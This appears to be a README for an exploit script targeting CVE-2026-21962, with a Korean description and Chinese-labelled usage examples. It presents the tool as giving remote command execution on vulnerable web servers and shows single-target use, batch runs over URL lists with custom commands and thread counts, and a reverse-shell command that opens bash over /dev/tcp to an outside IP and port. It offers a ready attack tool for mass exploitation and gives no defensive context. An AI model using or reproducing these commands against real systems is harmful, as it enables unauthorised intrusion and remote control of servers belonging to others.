
CVE-2026-21962용 익스플로잇 스크립트로, 취약한 웹 서버에서 원격 명령 실행을 가능하게 하며 단일 대상, 배치, 리버스 셸 모드를 지원합니다.
CVE-2026-21962
示例 单目标
python3 CVE-2026-21962.py http://target:7001 -c "whoami"
批量 + 默认 whoami
python3 CVE-2026-21962.py -f url.txt
批量 + 自定义命令 + 改线程数
python3 CVE-2026-21962.py -f url.txt -c "id" --threads 20 -o result.txt
反弹 shell 示例
python3 CVE-2026-21962.py -f targets.txt -c "bash -c 'bash -i >& /dev/tcp/1.1.1.1/4444 0>&1'"